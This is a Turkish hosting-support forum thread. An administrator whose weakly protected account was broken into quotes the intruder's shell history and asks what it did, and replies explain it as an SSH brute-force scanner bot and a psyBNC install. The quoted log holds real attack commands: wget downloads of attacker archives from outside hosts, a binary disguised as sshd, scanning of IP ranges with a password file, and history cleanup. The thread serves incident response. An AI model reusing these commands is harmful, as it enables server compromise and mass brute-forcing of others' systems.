SSH » SSH Soru ve Cevaplar

Bu komutlarla ne yapmış_?

http://forum.whmdestek.com/

Go Back   WHM/cPanel Support Platform » Türkçe » Site, Sunucu Sorunlarınız ve Çözümleri » SSH » SSH Soru ve Cevaplar
Reload this Page Bu komutlarla ne yapmış_?
 
Extreme yoksa Sayyac var!
Ücretsiz İstatistik Servisi
Sayyac.com
Reklam Alın!
Günlük 5k tekil ve üzeri sitelerinize reklam!
Fixreklam
Firma tanıtımı!
Firmanızın reklamını hemen yapın!
Reklamlar

Reply
 
LinkBack Thread Tools Display Modes
  #1  
Old 04.09.08, 05:39
Celeron
  
Join Date: Jan 2008
Location: Gonya
Posts: 89
Rep Power: 1
aydin is on a distinguished road
Bu komutlarla ne yapmış_?
Merhaba bir sitemiz vardı boşta duran host açılırken ssh erişimde açılmış nasıl olduysa
şifresi 123456 gibi basit birşeydi sanırım bulunması kolay olmustur.

içinde bilgi yok bomboş 200 mb lik bir site sadece htaccess yönlendirme ile yasaklanan bir siteyi basa siteye yönlendirmiştik


dün ssh de who dedim ve o kullanıcının ssh de oldugunu gördüm ip adresi yabancıydı neyse ssh den girip birşeyler kurmuş birşeyler yapmış 1- 1,5 AY önceleri fakat tam mana veremedim

ssh erişimi kapayıp şifre değişip suppend ettim

aşagıdaki bir yıgın komutları kullanmış sizce ne yapmıs olabilir siteler açayıp kasıyordu dün hatta adım atamıyorduk desem yeri

Quote:
uptime dir cd /tmp wget postcard.100free.com/san4o.tar tar xvf san4o.tar cd .." " PATH="." -sshd uname -a top su uptime ls cd /tmp wget postcard.100free.com/san4o.tar tar xvf san4o.tar cd .." " PATH="." -sshd uptime cd /tmp wget postcard.100free.com/san4o.tar tar xvf san4o.tar cd .." " PATH="." -sshd cd /tmp wget postcard.100free.com/san4o.tar tar xvf san4o.tar cd .." " PATH="." -sshd uptime cd /tmp wget postcard.100free.com/san4o.tar tar xvf san4o.tar cd .." " PATH="." -sshd su dir uname -a cd /tmp wget http://bnc.acmeshells.com/psyBNC-2.3.2-7.tar.gz tar -zxf psyBNC-2.3.2-7.tar.gz cd psybnc make make menuconfig ./psybnc uname -a cd /tmp wget branut.100free.com/2008.tar tar xvf 2008.tar cd .bran wget postcard.100free.com/tr.tar tar xvf tr.tar mv tr pass_file ./start 125.214 ./start 195.174 ./start 195.175 ./start 194.54 uname -a ls cd /tmp/.bran ./start 208.83 ./start 78.185 ./start 77.245 uname -a uptime wget idol.altervista.org/f.gif tar xzvf f.gif wget http://cociulia.ilive.ro/allmechs.tar cd CIOCAN ./go 66.228 wget memorex.zzl.org/Jeka/newscaner.tgz uname-a uptime uname -a dir uptime cd /tmp wget branut.100free.com/2008.tar wget postcard.100free.com/san4o.tar tar xvf san4o.tar cd .." " PATH="." -sshd cd /tmp tar xvf 2008.tar wget branut.100free.com/2008.tar cd /tmp wget branut.100free.com/2008.tar tar xvf tr.tar tar tar -Acdtrux uname -a uptime dir cd /tmp wget postcard.100free.com/san4o.tar tar xvf san4o.tar cd .." " PATH="." -sshd cd /var/tmp wget branut.100free.com/2008.tar uname -a uptime cd /tmp tar xvf san4o.tar -sshd cd .." " PATH="." -sshd cd /tmp tar xvf san4o.tar cd .." " PATH="." -sshd uptime uname -a ls uptime uname -a ls uptime cd /tmp wget http://bnc.acmeshells.com/psyBNC-2.3.2-7.tar.gz tar -zxf psyBNC-2.3.2-7.tar.gz cd psybnc make make menuconfig uptime cd /tmp wget branut.100free.com/2008.tar tar xvf 2008.tar cd .bran wget postcard.100free.com/tr.tar tar xvf tr.tar mv tr pass_file ./start 193.140 ./start 212.175 ./start 78.184 ./start ./start 78.183 ./start 78.182 ./start 88.242 ./start 88.241 ./start 88.233 ./start 59.182 ./start 212.115 ./start 212.252 ./start 212.33 ./start 212.57 ./start 212.98 ./start 89.19 ./start 212.174 ./start 88.255 ./start 78.166 ./start 78.184 ./start 78.190 ./start 202.125 cd /tmp/.bran ./start 62.244 uptime cd /tmp wget branut.100free.com/2008.tar tar xvf 2008.tar cd .bran rm -rf .bot rm -rf pass_file wget postcard.100free.com/br.tar tar xvf br.tar ./start 146.164 ./start 147.65 ./start 192.188 ./start 147.65 ./start 143.108 ./start 200.216 ./start 189.10 cd .bran cd /tmp tar xvf br.tar cd .bran tar xvf br.tar ./start 189.10 cd /tmp tar xvf br.tar cd .bran tar xvf br.tar ./start 200.212 cd .bran cd /tmp cd .bran tar xvf br.tar ./start 150.161 ./start 143.108 ./start 143.108 ./start 189.6 ./start 189.12 ./start 189.17 ./start 189.21 ./start 189.22 ./start 189.29 uptime cd /tmp cd .bran tar xvf br.tar ./start 189.37 ./start 161.148 ./start 139.82 ./start 208.70 cd /tmp cd .bran tar xvf br.tar ./start 146.164 cd /tmp cd .bran tar xvf br.tar ./start 201.3 cd .bran cd /tmp cd .bran tar xvf br.tar ./start 201.16 cd /tmp tar xvf san4o.tar wget postcard.100free.com/san4o.tar tar xvf san4o.tar cd .." " PATH="." -sshd cd /home;rm -rf .bash;exit cd /tmp tar xvf san4o.tar cd .." " PATH="." -sshd cd /home;rm -rf .bash;exit cd /tmp tar xvf san4o.tar cd .." " PATH="." -sshd cd /home;rm -rf .bash;exit cd /tmp tar xvf san4o.tar cd .." " PATH="." -sshd cd /home;rm -rf .bash;exit cd /tmp tar xvf san4o.tar cd .." " PATH="." -sshd cd /home;rm -rf .bash;exit uptime ls cd /tmp ls wget branut.100free.com/2008.tar tar xvf 2008.tar cd .bran rm -rf .bot rm -rf pass_file wget postcard.100free.com/br.tar tar xvf br.tar ./start 189.27 ./start 189.58 cd /tmp tar xvf san4o.tar wget postcard.100free.com/san4o.tar tar xvf san4o.tar cd .." " PATH="." -sshd cd /home;rm -rf .bash;exit cd /tmp tar xvf san4o.tar cd .." " PATH="." -sshd cd /tmp tar xvf san4o.tar cd .." " PATH="." -sshd cd /tmp cd .bran tar xvf br.tar ./start 201.77 ./start 205.169 ./start 209.133 cd /tmp cd .bran tar xvf br.tar ./start 209.133 ./start 209.13 ./start 209.131 ./start 209.132 uptime uname -a cd /tmp tar xvf san4o.tar wget postcard.100free.com/san4o.tar tar xvf san4o.tar cd .." " PATH="." -sshd cd /tmp tar xvf 2008.tar wget branut.100free.com/2008.tar tar xvf 2008.tar cd .bran rm -rf .bot rm -rf pass_file wget postcard.100free.com/br.tar tar xvf br.tar ./start 189.27 ./start 74.53 cd /tmp cd .bran tar xvf br.tar ./start 74.56 cd .bran tar xvf 2008.tar cd /tmp cd .bran tar xvf br.tar ./start 74.52 cd /tmp cd .bran tar xvf br.tar ./start 74.52 cd /tmp cd .bran tar xvf br.tar ./start 74.59 ./start 74.62 uptime cd /tmp cd .bran tar xvf br.tar ./start 74.33 ./start 212.160 ./start 212.134 cd /tmp cd .bran tar xvf br.tar ./start 206.162 ./start 206.163 ./start 206.198 ./start 206.111 ./start 206.113 ./start 206.117 ./start 206.119 ./start 74.119 cd /tmp cd .bran tar xvf br.tar ./start 74.154 ./start 211.136 cd /tmp cd .bran tar xvf br.tar ./start 84.17 uptime uname -a cd /tmp cd .bran tar xvf br.tar ./start 75.151 ./start 75.152 ./start 75.149 ./start 75.148 ./start 75.147 cd /tmp cd .bran tar xvf br.tar ./start 93.122 ./start 193.227 ls dir uptime cd /tmp cd .bran tar xvf br.tar ./start 150.162 cd /tmp cd .bran tar xvf br.tar ./start 143.108 cd /tmp cd .bran tar xvf br.tar ./start 143.108 ./start 146.164 cd /tmp cd .bran tar xvf br.tar ./start 143.108 ./start 146.164 ./start 143.139 cd /tmp cd .bran tar xvf br.tar ./start 150.163 ./start 200.209 ./start 190.246 ./start 190.24 ./start 190.23 ./start 65.116 cd /tmp cd .bran tar xvf br.tar ./start 208.73 cd /tmp tar xvf san4o.tar wget postcard.100free.com/san4o.tar tar xvf san4o.tar cd .." " PATH="." -sshd history history
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Spurl this Post!Reddit! Wong this Post!
Reply With Quote
  #2  
Old 10.09.08, 18:42
WoLeRiNe's Avatar
SDÜ Bilg. Programcılığı
  
Join Date: Jun 2007
Location: Isparta
Age: 19
Posts: 109
Rep Power: 2
WoLeRiNe is on a distinguished road
Send a message via MSN to WoLeRiNe Send a message via Yahoo to WoLeRiNe Send a message via Skype™ to WoLeRiNe
Fark ettiğim tek şey psyBNC kurulumu. Sanıyorum psyBNC kurmaya çalışmışlar.
__________________
Vizeler bitti. Antalya beni bekle. Geliyorum
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Spurl this Post!Reddit! Wong this Post!
Reply With Quote
  #3  
Old 11.09.08, 01:17
baracuda's Avatar
SysAdmin
  
Join Date: Jun 2008
Posts: 308
Rep Power: 2021
baracuda has a reputation beyond reputebaracuda has a reputation beyond reputebaracuda has a reputation beyond reputebaracuda has a reputation beyond reputebaracuda has a reputation beyond reputebaracuda has a reputation beyond reputebaracuda has a reputation beyond reputebaracuda has a reputation beyond reputebaracuda has a reputation beyond reputebaracuda has a reputation beyond reputebaracuda has a reputation beyond repute
Muhtemelen sunucunuzda shell yetkisi verdiğiniz bir kullanıcınız, ki bu sunucu irc sunucu ise muhtemelen vermişsinizdir.

BNC kurmaya çalışmıştır. Kurmuşmu kurmamışmı emin değilim
BNC nin ne olduğunu bilmiyorsanız www.google.com.tr den yüce bilgeye danışınız.

Saygılar.
__________________
Bir kişinin ki yardımcısı Allah ola, Var kıyas eyle ol ne şah ola!.
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Spurl this Post!Reddit! Wong this Post!
Reply With Quote
  #4  
Old 11.09.08, 01:25
CaLViN's Avatar
Sevgi güçtür.
  
Join Date: Apr 2007
Location: Outta nation
Age: 26
Posts: 1,681
Rep Power: 100000
CaLViN has a reputation beyond reputeCaLViN has a reputation beyond reputeCaLViN has a reputation beyond reputeCaLViN has a reputation beyond reputeCaLViN has a reputation beyond reputeCaLViN has a reputation beyond reputeCaLViN has a reputation beyond reputeCaLViN has a reputation beyond reputeCaLViN has a reputation beyond reputeCaLViN has a reputation beyond reputeCaLViN has a reputation beyond repute
Scanner bu.Şifreyi brute ile bulduktan sonra otomatik komutları sıralamış ve root yetkisi almaya çalışmış gördüğünüz gibi.
__________________
1.)Lütfen destek talebinde bulunmak için msn messenger üzerinden iletişime geçmeyiniz.
2.)Ücretsiz destek almak için forum sayfalarımızı kullanmanız aynı sorunu yaşayan diğer üyelerin cevaplara en kısa sürede ulaşabilmesi ve sizlere yardımcı olmak isteyen bizlerin ve diğer üyelerimizin zaman kazanmaları açısından çok önemlidir.
3.)Forumlarımızda sorunlarınızı anlatırken mümkün olduğunca çok detay vermeniz en kısa sürede sorununuza çözüm bulmanız açısından mühimdir.

Daha çok öğrenmek ve öğretmek dileğiyle..
Sevgiler..
The Platform.
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Spurl this Post!Reddit! Wong this Post!
Reply With Quote
  #5  
Old 11.09.08, 19:43
Celeron
  
Join Date: Jan 2008
Location: Gonya
Posts: 89
Rep Power: 1
aydin is on a distinguished road
birşey kurmuş ve shell oldugu düşünmedim degil ssh de ssh-scan yazısını görünce suppend yaptıgım halde işlem bitmeyince komple silip tekrar reboot yaparak cözdüm


Hatamız içinde sadece .htaccess olarak siteye girenleri baska siteye göndersin diye 2 dosya ekleyip birdaha girmemiştik ve şifreside 123456 idi nasıl buldular nasıl ettiler artık


Verdiginiz bilgiler için teşekkürler
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Spurl this Post!Reddit! Wong this Post!
Reply With Quote
  #6  
Old 31.10.08, 23:50
KasperSky's Avatar
SysAdmin
  
Join Date: Jun 2008
Posts: 121
Rep Power: 1001
KasperSky has a reputation beyond reputeKasperSky has a reputation beyond reputeKasperSky has a reputation beyond reputeKasperSky has a reputation beyond reputeKasperSky has a reputation beyond reputeKasperSky has a reputation beyond reputeKasperSky has a reputation beyond reputeKasperSky has a reputation beyond reputeKasperSky has a reputation beyond reputeKasperSky has a reputation beyond reputeKasperSky has a reputation beyond repute
Quote:
Originally Posted by CaLViN View Post
Scanner bu.Şifreyi brute ile bulduktan sonra otomatik komutları sıralamış ve root yetkisi almaya çalışmış gördüğünüz gibi.
evet bu CaLViN'in de dediği gibi Scanner Botlar, Genelde Yabancıların Kullandiği GoG'bot adı verilen bir yazılım var oldukca'da tehlikelidir. IRC Server Üzerinden Tarama Yaptırıp Nerede ise Tüm IP's leri gezip dolaşmaktadır googlebot gibi Bunların Olmaması İçin Daha önceden önlemler alabilirsiniz mesela en önce ssh telnet portunuzu standart olan "22" den değiştirmeniz gerekir.
Not: Sonradan Okuyanlar İçin Ekledim
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Spurl this Post!Reddit! Wong this Post!
Reply With Quote
Reply

« .htaccess 'in Seo Entegresindeki Problemi | SSH Donuyor - sql backup yükleme sırasında ssh de bekleme problemi »

Thread Tools
Display Modes
Linear Mode Linear Mode

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are On


Sign up for PayPal and start accepting credit card payments instantly.

Navigasyon
WHM
cPanel
Site, Server Genel
Oyun Sunucuları
IRC Sunucuları
Güvenlik
FTP
Database
DNS
SSH
Apache
Mail
Hosting ve Network
OS-İşletim Sistemleri
Hardware
Menü
Contact Us
Anasayfa
Archive
Privacy
Top



WHMDestek.Com © Nisan 2007 | Her Hakkı Saklıdır. | WHMDestek.Com © 2007 April | All rights reserved.
Lütfen, Alıntı yaparken kaynağı belirtmeyi unutmayınız. | Please dont forget to remember citing our name when quoting. (ybsg)